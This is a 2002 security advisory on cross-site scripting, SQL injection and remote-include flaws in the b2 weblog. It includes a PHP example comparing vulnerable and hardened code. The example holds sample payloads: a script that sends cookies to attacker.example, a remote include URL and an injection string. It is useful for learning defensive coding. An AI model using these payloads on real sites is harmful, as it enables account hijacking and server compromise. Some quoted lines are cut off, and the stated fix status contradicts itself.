b2 Weblog Has Multiple Holes That Let Remote Users Inject SQL Commands, Execute Commands on the System, and Conduct Cross-site Scripting Attacks
SecurityTracker Alert ID: 1005043
SecurityTracker URL: http://securitytracker.com/id/1005043
Date: Aug 14 2002
Impact: Disclosure of authentication information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
Several vulnerabilities were reported in the 'b2' weblog software. A remote user can execute commands on the web server, manipulate database contents, and conduct cross-site scripting attacks against b2 users.
It is reported that multiple variables are not properly initialized or filtered, resulting in several exploit possibilities. Because the affected variables are never initialized by the application, a remote user can supply them as GET, POST or cookie (GPC) data, which PHP's register_globals setting (on by default in PHP 4 releases before 4.2.0) places directly into the script's variables.
In some cases, a GPC-supplied value is echoed back to the reader's browser as unencoded HTML, allowing cross-site scripting. A remote user can create a specially crafted URL that, when loaded by a target user, causes arbitrary script to execute in the target user's browser. The script originates from the site running b2 and runs in that site's security context, so it can read the target user's cookies for the site (including authentication cookies), read data the target user recently submitted to the site via web form, or take actions on the site as the target user.
It is also reported that, in several places, the "tableposts" variable (the configured name of the posts table, used when building SQL queries) is not properly filtered. If PHP's magic_quotes_gpc option is not enabled, a remote user can inject SQL commands that the underlying database executes. The reporter notes that PHP's mysql_query() executes only one statement per call, which rules out stacked-query payloads but not injection within a single statement.
The "b2inc" variable is used as a portion of an include file path. If a remote user sets it via GPC to a URL pointing at PHP code on a server they control, and allow_url_fopen is enabled (PHP's default), the target server fetches and executes that code with the privileges of the web server process.
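The three flaw classes described above, as an added PHP example that is not b2's or CafeLog's own code. A constructed `$request` array stands in for what register_globals would have placed in `$b2inc`, `$tableposts` and `$s`; the host attacker.example, the file name b2config.php and the table allow-list are assumptions, and the script needs PHP 7 or later. The vulnerable functions return the path, query and HTML they would have used rather than calling include(), mysql_query() or echo, so the whole thing runs offline with `php b2_example.php`. Note that the constructed SQL payload lands in an unquoted identifier position and contains no quote characters, so magic_quotes_gpc (which only escapes quotes, backslashes and NUL) would not block it; the reporter's claim that magic_quotes_gpc eliminates the injection therefore depends on the variable landing inside a quoted string in the original code. The PHP directive governing remote includes is spelled allow_url_fopen.

```php
<?php
// Added example, not code from b2/CafeLog. Reproduces the advisory's
// three flaw classes (reflected XSS, SQL injection via $tableposts,
// remote include via $b2inc) with a constructed request array standing
// in for register_globals, so it runs without a database or web server.

// Constructed attacker-controlled GPC values: what register_globals=On
// would have assigned to $b2inc, $tableposts and $s before the script ran.
$request = [
    'b2inc'      => 'http://attacker.example/evil',   // hypothetical host
    'tableposts' => 'b2users WHERE 1=1 #',            // no quote characters needed
    's'          => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
];

/* ---------- Vulnerable patterns (do not deploy) ---------- */

// 1. Include path built from a request value. With allow_url_fopen=On,
//    include() on the returned string fetches and executes remote PHP.
function vulnerable_include_path(array $req): string
{
    return $req['b2inc'] . '/b2config.php';
}

// 2. Table name interpolated into the query unvalidated. The constructed
//    payload contains no quotes, so magic_quotes_gpc would not stop it,
//    and it stays a single statement, so mysql_query() would run it.
function vulnerable_query(array $req): string
{
    return "SELECT * FROM " . $req['tableposts'] . " WHERE post_status = 'publish'";
}

// 3. GPC value echoed back into HTML without encoding: reflected XSS.
function vulnerable_echo(array $req): string
{
    return "<p>Search results for " . $req['s'] . "</p>";
}

/* ---------- Hardened equivalents ---------- */

// 1. The include prefix is fixed by the application, never by the request.
//    (Also run with register_globals=Off and allow_url_include=Off.)
define('B2INC', __DIR__ . '/b2-include');   // hypothetical directory

function safe_include_path(): string
{
    return B2INC . '/b2config.php';
}

// 2. SQL identifiers cannot be bound as query parameters, so the request
//    value is checked against an allow-list of known table names.
function safe_table(string $candidate): string
{
    $allowed = ['b2posts', 'b2comments', 'b2users'];   // constructed allow-list
    if (!in_array($candidate, $allowed, true)) {
        throw new InvalidArgumentException('unknown table: ' . $candidate);
    }
    return $candidate;
}

function safe_query(array $req): string
{
    $table = safe_table($req['tableposts'] ?? 'b2posts');
    return "SELECT * FROM `$table` WHERE post_status = 'publish'";
}

// 3. Encode on output so a payload is rendered as text, not executed.
function safe_echo(array $req): string
{
    $s = htmlspecialchars($req['s'] ?? '', ENT_QUOTES, 'UTF-8');
    return "<p>Search results for " . $s . "</p>";
}

/* ---------- Run both sides against the constructed request ---------- */
echo "vulnerable include : ", vulnerable_include_path($request), "\n";
echo "vulnerable query   : ", vulnerable_query($request), "\n";
echo "vulnerable echo    : ", vulnerable_echo($request), "\n";
echo "safe include       : ", safe_include_path(), "\n";
try {
    echo "safe query         : ", safe_query($request), "\n";
} catch (InvalidArgumentException $e) {
    echo "safe query         : rejected (", $e->getMessage(), ")\n";
}
echo "safe echo          : ", safe_echo($request), "\n";
```

The hardened half follows the order a reviewer would apply it: remove request control over the include path entirely rather than filtering the URL, allow-list identifiers because they cannot be parameterized, and encode at the point of output rather than trying to strip script tags on input.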
A remote user can access a target user's cookies for the b2 site (including authentication cookies), read data the target user recently submitted to the site via web form, or take actions on the site as the target user.
A remote user may be able to inject SQL commands that are executed by the underlying database server.
A remote user may be able to execute arbitrary commands on the server with the privileges of the web server process.
No vendor patch was available at the time of this entry. The reporter's advisory below describes configuration workarounds (enabling magic_quotes_gpc against the SQL injection and disabling remote URL opening against the include flaw) but notes that the cross-site scripting issues can only be fixed by a patch to the application.
Vendor URL: www.cafelog.com/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Source Message Contents
Subject: Multiple Vulnerabilities in CafeLog Weblog Package
Security Advisory: Multiple Vulnerabilities in CafeLog Weblog Package
Additional Details: http://www.murphy.101main.net/vulns/2002-26.txt
Issue: Multiple vulnerabilities -- the most serious could allow malicious
users to execute commands against a web server running the vulnerable
Scope: Command execution, database manipulation, and
Affected software: CafeLog b2 Weblog Tool 2.06pre4 confirmed;
Numerous serious vulnerabilities exist in the "b2" weblog tool by
CafeLog. Numerous variables are not properly initialized or sanitized,
allowing for several unsafe actions.
There are numerous cases of small bits of data being echoed back
to the browser from variables that can be remotely set by a GPC
variable. This enables a simple cross-site scripting attack.
Further, there are several cases where the "tableposts" variable is
used without proper sanitization. If the machine does not have the option
"magic_quotes_gpc" enabled, an SQL injection attack can be levied
against the backend database. However, this may be hampered by
reported bugs in the PHP mysql_query() function (it only completes
the first query in a series) that prevent multiple queries from being
Also, the variable "b2inc" is used as a portion of an include file
if this variable is set via GPC, commands can be executed or arbitrary
There are significant mitigating factors to both the SQL injection
and command-execution vulnerabilities. The SQL injection flaw can
only be exploited if magic_quotes_gpc has been disabled. The SQL
injection may be further hampered by an issue in the PHP mysql_query()
function -- it only executes one query at a time.
Further, the command execution should be limited to the rights of the
PHP user, barring exploitation of additional vulnerabilities. On Unix,
this should be nobody/nobody. On Windows NT/2000/XP, this may
be the privileges of the IIS Internet Web Account Manager (IWAM),
equivalent to a guest user. On other NT servers, this will be a similar
Enabling magic_quotes_gpc eliminates the SQL injection and file reading
Disabling allow_url_fopen eliminates the command execution vulnerabilities
However, the cross-site scripting vulnerabilities must be eliminated by a
patch to the application.
"The reason the mainstream is thought
of as a stream is because it is
- Author Unknown